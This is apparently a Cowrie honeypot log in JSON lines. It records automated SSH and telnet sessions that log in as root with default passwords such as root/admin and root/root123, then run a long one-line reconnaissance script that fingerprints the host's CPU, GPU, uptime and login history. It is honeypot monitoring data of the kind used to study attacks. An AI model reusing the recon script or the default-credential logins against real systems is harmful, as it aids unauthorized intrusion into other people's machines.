{"eventid":"cowrie.command.input","input":"export PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin; uname=$(uname -s -v -n -m 2>/dev/null); arch=$(uname -m 2>/dev/null); uptime=$(awk '{u=int($1);d=int(u/86400);h=int((u%86400)/3600);m=int((u%3600)/60);s=\"\";if(d>0)s=s d\"d\";if(h>0){if(s!=\"\")s=s\", \";s=s h\"h\"}if(m>0||s==\"\"){if(s!=\"\")s=s, \";s=s m\"m\"}print s}' /proc/uptime 2>/dev/null); [ -z \"$uptime\" ] && secondsStr=$(cat /proc/uptime 2>/dev/null | cut -d' ' -f1 | cut -d. -f1) && [ -n \"$secondsStr\" ] && seconds=$((secondsStr)) && d=$((seconds/86400)) && h=$(( (seconds%86400)/3600 )) && m=$(( (seconds%3600)/60 )) && uptime=\"\" && [ $d -gt 0 ] && uptime=\"${uptime}${d}d\" && [ $h -gt 0 ] && { [ -n \"$uptime\" ] && uptime=\"$uptime, \"; uptime=\"${uptime}${h}h\"; } && { [ $m -gt 0 ] || [ -z \"$uptime\" ]; } && { [ -n \"$uptime\" ] && uptime=\"$uptime, \"; uptime=\"${uptime}${m}m\"; }; cpus=$( (nproc || grep -c \"^processor\" /proc/cpuinfo) 2>/dev/null | head -1); cpu_model=$( (grep -m1 -E \"model name|Hardware\" /proc/cpuinfo | cut -d: -f2- | sed 's/^ *//;s/ *$//' ; lscpu 2>/dev/null | awk -F: '/Model name/ {gsub(/^ +| +$/,\"\",$2); print $2; exit}' ; dmidecode -s processor-version 2>/dev/null | head -n1 ; uname -p 2>/dev/null) | awk 'NF{print; exit}' ); gpu_info=$( (lspci 2>/dev/null | grep -i vga; lspci 2>/dev/null | grep -i nvidia) 2>/dev/null | head -n50); cat_help=$( (cat --help 2>&1 | tr '\\n' ' ') || cat --help 2>&1); ls_help=$( (ls --help 2>&1 | tr '\\n' ' ') || ls --help 2>&1); last_output=$(last 2>/dev/null | head -n 10); echo \"UNAME:$uname\"; echo \"ARCH:$arch\"; echo \"UPTIME:$uptime\"; echo \"CPUS:$cpus\"; echo \"CPU_MODEL:$cpu_model\"; echo \"GPU:$gpu_info\"; echo \"CAT_HELP:$cat_help\"; echo \"LS_HELP:$ls_help\"; echo \"LAST:$last_output\"","message":"CMD: export PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin; uname=$(uname -s -v -n -m 2>/dev/null); arch=$(uname -m 2>/dev/null); uptime=$(awk '{u=int($1);d=int(u/86400);h=int((u%86400)/3600);m=int((u%3600)/60);s=\"\";if(d>0)s=s d\"d\";if(h>0){if(s!=\"\")s=s\", \";s=s h\"h\"}if(m>0||s==\"\"){if(s!=\"\")s=s, \";s=s m\"m\"}print s}' /proc/uptime 2>/dev/null); [ -z \"$uptime\" ] && secondsStr=$(cat /proc/uptime 2>/dev/null | cut -d' ' -f1 | cut -d. -f1) && [ -n \"$secondsStr\" ] && seconds=$((secondsStr)) && d=$((seconds/86400)) && h=$(( (seconds%86400)/3600 )) && m=$(( (seconds%3600)/60 )) && uptime=\"\" && [ $d -gt 0 ] && uptime=\"${uptime}${d}d\" && [ $h -gt 0 ] && { [ -n \"$uptime\" ] && uptime=\"$uptime, \"; uptime=\"${uptime}${h}h\"; } && { [ $m -gt 0 ] || [ -z \"$uptime\" ]; } && { [ -n \"$uptime\" ] && uptime=\"$uptime, \"; uptime=\"${uptime}${m}m\"; }; cpus=$( (nproc || grep -c \"^processor\" /proc/cpuinfo) 2>/dev/null | head -1); cpu_model=$( (grep -m1 -E \"model name|Hardware\" /proc/cpuinfo | cut -d: -f2- | sed 's/^ *//;s/ *$//' ; lscpu 2>/dev/null | awk -F: '/Model name/ {gsub(/^ +| +$/,\"\",$2); print $2; exit}' ; dmidecode -s processor-version 2>/dev/null | head -n1 ; uname -p 2>/dev/null) | awk 'NF{print; exit}' ); gpu_info=$( (lspci 2>/dev/null | grep -i vga; lspci 2>/dev/null | grep -i nvidia) 2>/dev/null | head -n50); cat_help=$( (cat --help 2>&1 | tr '\\n' ' ') || cat --help 2>&1); ls_help=$( (ls --help 2>&1 | tr '\\n' ' ') || ls --help 2>&1); last_output=$(last 2>/dev/null | head -n 10); echo \"UNAME:$uname\"; echo \"ARCH:$arch\"; echo \"UPTIME:$uptime\"; echo \"CPUS:$cpus\"; echo \"CPU_MODEL:$cpu_model\"; echo \"GPU:$gpu_info\"; echo \"CAT_HELP:$cat_help\"; echo \"LS_HELP:$ls_help\"; echo \"LAST:$last_output\"","sensor":"my-vps","timestamp":"2025-09-08T19:24:07.173855Z","src_ip":"212.227.125.160","session":"45328de0c5fd"}
{"eventid":"cowrie.command.input","input":"uname -s -v -n -m 2 > /dev/null","message":"CMD: uname -s -v -n -m 2 > /dev/null","sensor":"my-vps","timestamp":"2025-09-08T19:24:07.174602Z","src_ip":"212.227.125.160","session":"45328de0c5fd"}
{"eventid":"cowrie.command.input","input":"uname -m 2 > /dev/null","message":"CMD: uname -m 2 > /dev/null","sensor":"my-vps","timestamp":"2025-09-08T19:24:07.175642Z","src_ip":"212.227.125.160","session":"45328de0c5fd"}
{"eventid":"cowrie.command.input","input":"awk {u=int($1","message":"CMD: awk {u=int($1","sensor":"my-vps","timestamp":"2025-09-08T19:24:07.176671Z","src_ip":"212.227.125.160","session":"45328de0c5fd"}
{"eventid":"cowrie.command.input","input":"cat /proc/uptime 2 > /dev/null | cut -d -f1 | cut -d. -f1","message":"CMD: cat /proc/uptime 2 > /dev/null | cut -d -f1 | cut -d. -f1","sensor":"my-vps","timestamp":"2025-09-08T19:24:07.177483Z","src_ip":"212.227.125.160","session":"45328de0c5fd"}
{"eventid":"cowrie.command.failed","input":"cat /proc/uptime 2 > /dev/null | cut -d -f1 | cut -d. -f1","message":"Command not found: cat /proc/uptime 2 > /dev/null | cut -d -f1 | cut -d. -f1","sensor":"my-vps","timestamp":"2025-09-08T19:24:07.178343Z","src_ip":"212.227.125.160","session":"45328de0c5fd"}
{"eventid":"cowrie.command.input","input":"(secondsStr","message":"CMD: (secondsStr","sensor":"my-vps","timestamp":"2025-09-08T19:24:07.179454Z","src_ip":"212.227.125.160","session":"45328de0c5fd"}
{"eventid":"cowrie.command.input","input":"(seconds/86400","message":"CMD: (seconds/86400","sensor":"my-vps","timestamp":"2025-09-08T19:24:07.180031Z","src_ip":"212.227.125.160","session":"45328de0c5fd"}
{"eventid":"cowrie.command.input","input":"( (seconds%86400","message":"CMD: ( (seconds%86400","sensor":"my-vps","timestamp":"2025-09-08T19:24:07.181190Z","src_ip":"212.227.125.160","session":"45328de0c5fd"}
{"eventid":"cowrie.command.input","input":"(seconds%86400","message":"CMD: (seconds%86400","sensor":"my-vps","timestamp":"2025-09-08T19:24:07.181771Z","src_ip":"212.227.125.160","session":"45328de0c5fd"}
{"eventid":"cowrie.command.input","input":"( (seconds%3600","message":"CMD: ( (seconds%3600","sensor":"my-vps","timestamp":"2025-09-08T19:24:07.182411Z","src_ip":"212.227.125.160","session":"45328de0c5fd"}
{"eventid":"cowrie.command.input","input":"(seconds%3600","message":"CMD: (seconds%3600","sensor":"my-vps","timestamp":"2025-09-08T19:24:07.182890Z","src_ip":"212.227.125.160","session":"45328de0c5fd"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/1b20a210fe96e5a8abc347dfb91d7befecb4b5f9b7ed40d856410fac15952057","shasum":"1b20a210fe96e5a8abc347dfb91d7befecb4b5f9b7ed40d856410fac15952057","destfile":"/dev/null","message":"Saved redir contents with SHA-256 1b20a210fe96e5a8abc347dfb91d7befecb4b5f9b7ed40d856410fac15952057 to var/lib/cowrie/downloads/1b20a210fe96e5a8abc347dfb91d7befecb4b5f9b7ed40d856410fac15952057","sensor":"my-vps","timestamp":"2025-09-08T19:24:07.566844Z","src_ip":"212.227.125.160","session":"45328de0c5fd"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/d6c4d77c172f9621774c6ab5652eb71cc483037c77e71185e88a7b9edcaf1287","size":74,"shasum":"d6c4d77c172f9621774c6ab5652eb71cc483037c77e71185e88a7b9edcaf1287","duplicate":true,"duration":"0.4","message":"Closing TTY Log: var/lib/cowrie/tty/d6c4d77c172f9621774c6ab5652eb71cc483037c77e71185e88a7b9edcaf1287 after 0.4 seconds","sensor":"my-vps","timestamp":"2025-09-08T19:24:07.567737Z","src_ip":"212.227.125.160","session":"45328de0c5fd"}
{"eventid":"cowrie.session.closed","duration":"2.9","message":"Connection lost after 2.9 seconds","sensor":"my-vps","timestamp":"2025-09-08T19:24:07.568735Z","src_ip":"212.227.125.160","session":"45328de0c5fd"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":45832,"dst_ip":"1.2.3.4","dst_port":23,"session":"8e5ea0c6d027","protocol":"telnet","message":"New connection: 212.227.125.160:45832 (1.2.3.4:23) [session: 8e5ea0c6d027]","sensor":"my-vps","timestamp":"2025-09-08T19:24:09.345440Z"}
{"eventid":"cowrie.login.success","username":"root","password":"admin","message":"login attempt [root/admin] succeeded","sensor":"my-vps","timestamp":"2025-09-08T19:24:09.431965Z","src_ip":"212.227.125.160","session":"8e5ea0c6d027"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T19:24:09.517602Z","src_ip":"212.227.125.160","session":"8e5ea0c6d027"}
{"eventid":"cowrie.session.closed","duration":39.776939153671265,"message":"Connection lost after 39 seconds","sensor":"my-vps","timestamp":"2025-09-08T19:24:15.830874Z","src_ip":"212.227.235.229","session":"f83a2b7d6531"}
{"eventid":"cowrie.session.closed","duration":"120.0","message":"Connection lost after 120.0 seconds","sensor":"my-vps","timestamp":"2025-09-08T19:25:10.852559Z","src_ip":"1.92.34.210","session":"8075f7b24e3a"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":48988,"dst_ip":"1.2.3.4","dst_port":22,"session":"3a0a76e1a120","protocol":"ssh","message":"New connection: 212.227.235.229:48988 (1.2.3.4:22) [session: 3a0a76e1a120]","sensor":"my-vps","timestamp":"2025-09-08T19:25:29.468327Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-09-08T19:25:29.522786Z","src_ip":"212.227.235.229","session":"3a0a76e1a120"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-09-08T19:25:29.746833Z","src_ip":"212.227.235.229","session":"3a0a76e1a120"}
{"eventid":"cowrie.login.success","username":"root","password":"root123","message":"login attempt [root/root123] succeeded","sensor":"my-vps","timestamp":"2025-09-08T19:25:30.864067Z","src_ip":"212.227.235.229","session":"3a0a76e1a120"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":36852,"dst_ip":"1.2.3.4","dst_port":22,"session":"92d3365a6b86","protocol":"ssh","message":"New connection: 212.227.125.160:36852 (1.2.3.4:22) [session: 92d3365a6b86]","sensor":"my-vps","timestamp":"2025-09-08T19:25:31.362508Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-09-08T19:25:31.394408Z","src_ip":"212.227.125.160","session":"92d3365a6b86"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T19:25:31.546561Z","src_ip":"212.227.235.229","session":"3a0a76e1a120"}
{"eventid":"cowrie.command.input","input":"export PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin; uname=$(uname -s -v -n -m 2>/dev/null); arch=$(uname -m 2>/dev/null); uptime=$(awk '{u=int($1);d=int(u/86400);h=int((u%86400)/3600);m=int((u%3600)/60);s=\"\";if(d>0)s=s d\"d\";if(h>0){if(s!=\"\")s=s\", \";s=s h\"h\"}if(m>0||s==\"\"){if(s!=\"\")s=s, \";s=s m\"m\"}print s}' /proc/uptime 2>/dev/null); [ -z \"$uptime\" ] && secondsStr=$(cat /proc/uptime 2>/dev/null | cut -d' ' -f1 | cut -d. -f1) && [ -n \"$secondsStr\" ] && seconds=$((secondsStr)) && d=$((seconds/86400)) && h=$(( (seconds%86400)/3600 )) && m=$(( (seconds%3600)/60 )) && uptime=\"\" && [ $d -gt 0 ] && uptime=\"${uptime}${d}d\" && [ $h -gt 0 ] && { [ -n \"$uptime\" ] && uptime=\"$uptime, \"; uptime=\"${uptime}${h}h\"; } && { [ $m -gt 0 ] || [ -z \"$uptime\" ]; } && { [ -n \"$uptime\" ] && uptime=\"$uptime, \"; uptime=\"${uptime}${m}m\"; }; cpus=$( (nproc || grep -c \"^processor\" /proc/cpuinfo) 2>/dev/null | head -1); cpu_model=$( (grep -m1 -E \"model name|Hardware\" /proc/cpuinfo | cut -d: -f2- | sed 's/^ *//;s/ *$//' ; lscpu 2>/dev/null | awk -F: '/Model name/ {gsub(/^ +| +$/,\"\",$2); print $2; exit}' ; dmidecode -s processor-version 2>/dev/null | head -n1 ; uname -p 2>/dev/null) | awk 'NF{print; exit}' ); gpu_info=$( (lspci 2>/dev/null | grep -i vga; lspci 2>/dev/null | grep -i nvidia) 2>/dev/null | head -n50); cat_help=$( (cat --help 2>&1 | tr '\\n' ' ') || cat --help 2>&1); ls_help=$( (ls --help 2>&1 | tr '\\n' ' ') || ls --help 2>&1); last_output=$(last 2>/dev/null | head -n 10); echo \"UNAME:$uname\"; echo \"ARCH:$arch\"; echo \"UPTIME:$uptime\"; echo \"CPUS:$cpus\"; echo \"CPU_MODEL:$cpu_model\"; echo \"GPU:$gpu_info\"; echo \"CAT_HELP:$cat_help\"; echo \"LS_HELP:$ls_help\"; echo \"LAST:$last_output\"","message":"CMD: export PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin; uname=$(uname -s -v -n -m 2>/dev/null); arch=$(uname -m 2>/dev/null); uptime=$(awk '{u=int($1);d=int(u/86400);h=int((u%86400)/3600);m=int((u%3600)/60);s=\"\";if(d>0)s=s d\"d\";if(h>0){if(s!=\"\")s=s\", \";s=s h\"h\"}if(m>0||s==\"\"){if(s!=\"\")s=s, \";s=s m\"m\"}print s}' /proc/uptime 2>/dev/null); [ -z \"$uptime\" ] && secondsStr=$(cat /proc/uptime 2>/dev/null | cut -d' ' -f1 | cut -d. -f1) && [ -n \"$secondsStr\" ] && seconds=$((secondsStr)) && d=$((seconds/86400)) && h=$(( (seconds%86400)/3600 )) && m=$(( (seconds%3600)/60 )) && uptime=\"\" && [ $d -gt 0 ] && uptime=\"${uptime}${d}d\" && [ $h -gt 0 ] && { [ -n \"$uptime\" ] && uptime=\"$uptime, \"; uptime=\"${uptime}${h}h\"; } && { [ $m -gt 0 ] || [ -z \"$uptime\" ]; } && { [ -n \"$uptime\" ] && uptime=\"$uptime, \"; uptime=\"${uptime}${m}m\"; }; cpus=$( (nproc || grep -c \"^processor\" /proc/cpuinfo) 2>/dev/null | head -1); cpu_model=$( (grep -m1 -E \"model name|Hardware\" /proc/cpuinfo | cut -d: -f2- | sed 's/^ *//;s/ *$//' ; lscpu 2>/dev/null | awk -F: '/Model name/ {gsub(/^ +| +$/,\"\",$2); print $2; exit}' ; dmidecode -s processor-version 2>/dev/null | head -n1 ; uname -p 2>/dev/null) | awk 'NF{print; exit}' ); gpu_info=$( (lspci 2>/dev/null | grep -i vga; lspci 2>/dev/null | grep -i nvidia) 2>/dev/null | head -n50); cat_help=$( (cat --help 2>&1 | tr '\\n' ' ') || cat --help 2>&1); ls_help=$( (ls --help 2>&1 | tr '\\n' ' ') || ls --help 2>&1); last_output=$(last 2>/dev/null | head -n 10); echo \"UNAME:$uname\"; echo \"ARCH:$arch\"; echo \"UPTIME:$uptime\"; echo \"CPUS:$cpus\"; echo \"CPU_MODEL:$cpu_model\"; echo \"GPU:$gpu_info\"; echo \"CAT_HELP:$cat_help\"; echo \"LS_HELP:$ls_help\"; echo \"LAST:$last_output\"","sensor":"my-vps","timestamp":"2025-09-08T19:25:31.547256Z","src_ip":"212.227.235.229","session":"3a0a76e1a120"}
{"eventid":"cowrie.command.input","input":"uname -s -v -n -m 2 > /dev/null","message":"CMD: uname -s -v -n -m 2 > /dev/null","sensor":"my-vps","timestamp":"2025-09-08T19:25:31.547894Z","src_ip":"212.227.235.229","session":"3a0a76e1a120"}
{"eventid":"cowrie.command.input","input":"uname -m 2 > /dev/null","message":"CMD: uname -m 2 > /dev/null","sensor":"my-vps","timestamp":"2025-09-08T19:25:31.548867Z","src_ip":"212.227.235.229","session":"3a0a76e1a120"}
{"eventid":"cowrie.command.input","input":"awk {u=int($1","message":"CMD: awk {u=int($1","sensor":"my-vps","timestamp":"2025-09-08T19:25:31.550493Z","src_ip":"212.227.235.229","session":"3a0a76e1a120"}
{"eventid":"cowrie.command.input","input":"cat /proc/uptime 2 > /dev/null | cut -d -f1 | cut -d. -f1","message":"CMD: cat /proc/uptime 2 > /dev/null | cut -d -f1 | cut -d. -f1","sensor":"my-vps","timestamp":"2025-09-08T19:25:31.551304Z","src_ip":"212.227.235.229","session":"3a0a76e1a120"}
{"eventid":"cowrie.command.failed","input":"cat /proc/uptime 2 > /dev/null | cut -d -f1 | cut -d. -f1","message":"Command not found: cat /proc/uptime 2 > /dev/null | cut -d -f1 | cut -d. -f1","sensor":"my-vps","timestamp":"2025-09-08T19:25:31.551962Z","src_ip":"212.227.235.229","session":"3a0a76e1a120"}
{"eventid":"cowrie.command.input","input":"(secondsStr","message":"CMD: (secondsStr","sensor":"my-vps","timestamp":"2025-09-08T19:25:31.553197Z","src_ip":"212.227.235.229","session":"3a0a76e1a120"}
{"eventid":"cowrie.command.input","input":"(seconds/86400","message":"CMD: (seconds/86400","sensor":"my-vps","timestamp":"2025-09-08T19:25:31.553678Z","src_ip":"212.227.235.229","session":"3a0a76e1a120"}
{"eventid":"cowrie.command.input","input":"( (seconds%86400","message":"CMD: ( (seconds%86400","sensor":"my-vps","timestamp":"2025-09-08T19:25:31.554142Z","src_ip":"212.227.235.229","session":"3a0a76e1a120"}
{"eventid":"cowrie.command.input","input":"(seconds%86400","message":"CMD: (seconds%86400","sensor":"my-vps","timestamp":"2025-09-08T19:25:31.554586Z","src_ip":"212.227.235.229","session":"3a0a76e1a120"}
{"eventid":"cowrie.command.input","input":"( (seconds%3600","message":"CMD: ( (seconds%3600","sensor":"my-vps","timestamp":"2025-09-08T19:25:31.555170Z","src_ip":"212.227.235.229","session":"3a0a76e1a120"}
{"eventid":"cowrie.command.input","input":"(seconds%3600","message":"CMD: (seconds%3600","sensor":"my-vps","timestamp":"2025-09-08T19:25:31.555715Z","src_ip":"212.227.235.229","session":"3a0a76e1a120"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-09-08T19:25:31.678198Z","src_ip":"212.227.125.160","session":"92d3365a6b86"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/1b20a210fe96e5a8abc347dfb91d7befecb4b5f9b7ed40d856410fac15952057","shasum":"1b20a210fe96e5a8abc347dfb91d7befecb4b5f9b7ed40d856410fac15952057","destfile":"/dev/null","message":"Saved redir contents with SHA-256 1b20a210fe96e5a8abc347dfb91d7befecb4b5f9b7ed40d856410fac15952057 to var/lib/cowrie/downloads/1b20a210fe96e5a8abc347dfb91d7befecb4b5f9b7ed40d856410fac15952057","sensor":"my-vps","timestamp":"2025-09-08T19:25:31.835267Z","src_ip":"212.227.235.229","session":"3a0a76e1a120"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/d6c4d77c172f9621774c6ab5652eb71cc483037c77e71185e88a7b9edcaf1287","size":74,"shasum":"d6c4d77c172f9621774c6ab5652eb71cc483037c77e71185e88a7b9edcaf1287","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/d6c4d77c172f9621774c6ab5652eb71cc483037c77e71185e88a7b9edcaf1287 after 0.3 seconds","sensor":"my-vps","timestamp":"2025-09-08T19:25:31.836109Z","src_ip":"212.227.235.229","session":"3a0a76e1a120"}
{"eventid":"cowrie.session.closed","duration":"2.4","message":"Connection lost after 2.4 seconds","sensor":"my-vps","timestamp":"2025-09-08T19:25:31.837617Z","src_ip":"212.227.235.229","session":"3a0a76e1a120"}
{"eventid":"cowrie.login.success","username":"root","password":"root123","message":"login attempt [root/root123] succeeded","sensor":"my-vps","timestamp":"2025-09-08T19:25:32.957137Z","src_ip":"212.227.125.160","session":"92d3365a6b86"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T19:25:33.655185Z","src_ip":"212.227.125.160","session":"92d3365a6b86"}
{"eventid":"cowrie.command.input","input":"export PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin; uname=$(uname -s -v -n -m 2>/dev/null); arch=$(uname -m 2>/dev/null); uptime=$(awk '{u=int($1);d=int(u/86400);h=int((u%86400)/3600);m=int((u%3600)/60);s=\"\";if(d>0)s=s d\"d\";if(h>0){if(s!=\"\")s=s\", \";s=s h\"h\"}if(m>0||s==\"\"){if(s!=\"\")s=s, \";s=s m\"m\"}print s}' /proc/uptime 2>/dev/null); [ -z \"$uptime\" ] && secondsStr=$(cat /proc/uptime 2>/dev/null | cut -d' ' -f1 | cut -d. -f1) && [ -n \"$secondsStr\" ] && seconds=$((secondsStr)) && d=$((seconds/86400)) && h=$(( (seconds%86400)/3600 )) && m=$(( (seconds%3600)/60 )) && uptime=\"\" && [ $d -gt 0 ] && uptime=\"${uptime}${d}d\" && [ $h -gt 0 ] && { [ -n \"$uptime\" ] && uptime=\"$uptime, \"; uptime=\"${uptime}${h}h\"; } && { [ $m -gt 0 ] || [ -z \"$uptime\" ]; } && { [ -n \"$uptime\" ] && uptime=\"$uptime, \"; uptime=\"${uptime}${m}m\"; }; cpus=$( (nproc || grep -c \"^processor\" /proc/cpuinfo) 2>/dev/null | head -1); cpu_model=$( (grep -m1 -E \"model name|Hardware\" /proc/cpuinfo | cut -d: -f2- | sed 's/^ *//;s/ *$//' ; lscpu 2>/dev/null | awk -F: '/Model name/ {gsub(/^ +| +$/,\"\",$2); print $2; exit}' ; dmidecode -s processor-version 2>/dev/null | head -n1 ; uname -p 2>/dev/null) | awk 'NF{print; exit}' ); gpu_info=$( (lspci 2>/dev/null | grep -i vga; lspci 2>/dev/null | grep -i nvidia) 2>/dev/null | head -n50); cat_help=$( (cat --help 2>&1 | tr '\\n' ' ') || cat --help 2>&1); ls_help=$( (ls --help 2>&1 | tr '\\n' ' ') || ls --help 2>&1); last_output=$(last 2>/dev/null | head -n 10); echo \"UNAME:$uname\"; echo \"ARCH:$arch\"; echo \"UPTIME:$uptime\"; echo \"CPUS:$cpus\"; echo \"CPU_MODEL:$cpu_model\"; echo \"GPU:$gpu_info\"; echo \"CAT_HELP:$cat_help\"; echo \"LS_HELP:$ls_help\"; echo \"LAST:$last_output\"","message":"CMD: export PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin; uname=$(uname -s -v -n -m 2>/dev/null); arch=$(uname -m 2>/dev/null); uptime=$(awk '{u=int($1);d=int(u/86400);h=int((u%86400)/3600);m=int((u%3600)/60);s=\"\";if(d>0)s=s d\"d\";if(h>0){if(s!=\"\")s=s\", \";s=s h\"h\"}if(m>0||s==\"\"){if(s!=\"\")s=s, \";s=s m\"m\"}print s}' /proc/uptime 2>/dev/null); [ -z \"$uptime\" ] && secondsStr=$(cat /proc/uptime 2>/dev/null | cut -d' ' -f1 | cut -d. -f1) && [ -n \"$secondsStr\" ] && seconds=$((secondsStr)) && d=$((seconds/86400)) && h=$(( (seconds%86400)/3600 )) && m=$(( (seconds%3600)/60 )) && uptime=\"\" && [ $d -gt 0 ] && uptime=\"${uptime}${d}d\" && [ $h -gt 0 ] && { [ -n \"$uptime\" ] && uptime=\"$uptime, \"; uptime=\"${uptime}${h}h\"; } && { [ $m -gt 0 ] || [ -z \"$uptime\" ]; } && { [ -n \"$uptime\" ] && uptime=\"$uptime, \"; uptime=\"${uptime}${m}m\"; }; cpus=$( (nproc || grep -c \"^processor\" /proc/cpuinfo) 2>/dev/null | head -1); cpu_model=$( (grep -m1 -E \"model name|Hardware\" /proc/cpuinfo | cut -d: -f2- | sed 's/^ *//;s/ *$//' ; lscpu 2>/dev/null | awk -F: '/Model name/ {gsub(/^ +| +$/,\"\",$2); print $2; exit}' ; dmidecode -s processor-version 2>/dev/null | head -n1 ; uname -p 2>/dev/null) | awk 'NF{print; exit}' ); gpu_info=$( (lspci 2>/dev/null | grep -i vga; lspci 2>/dev/null | grep -i nvidia) 2>/dev/null | head -n50); cat_help=$( (cat --help 2>&1 | tr '\\n' ' ') || cat --help 2>&1); ls_help=$( (ls --help 2>&1 | tr '\\n' ' ') || ls --help 2>&1); last_output=$(last 2>/dev/null | head -n 10); echo \"UNAME:$uname\"; echo \"ARCH:$arch\"; echo \"UPTIME:$uptime\"; echo \"CPUS:$cpus\"; echo \"CPU_MODEL:$cpu_model\"; echo \"GPU:$gpu_info\"; echo \"CAT_HELP:$cat_help\"; echo \"LS_HELP:$ls_help\"; echo \"LAST:$last_output\"","sensor":"my-vps","timestamp":"2025-09-08T19:25:33.655949Z","src_ip":"212.227.125.160","session":"92d3365a6b86"}
{"eventid":"cowrie.command.input","input":"uname -s -v -n -m 2 > /dev/null","message":"CMD: uname -s -v -n -m 2 > /dev/null","sensor":"my-vps","timestamp":"2025-09-08T19:25:33.656860Z","src_ip":"212.227.125.160","session":"92d3365a6b86"}
{"eventid":"cowrie.command.input","input":"uname -m 2 > /dev/null","message":"CMD: uname -m 2 > /dev/null","sensor":"my-vps","timestamp":"2025-09-08T19:25:33.659013Z","src_ip":"212.227.125.160","session":"92d3365a6b86"}
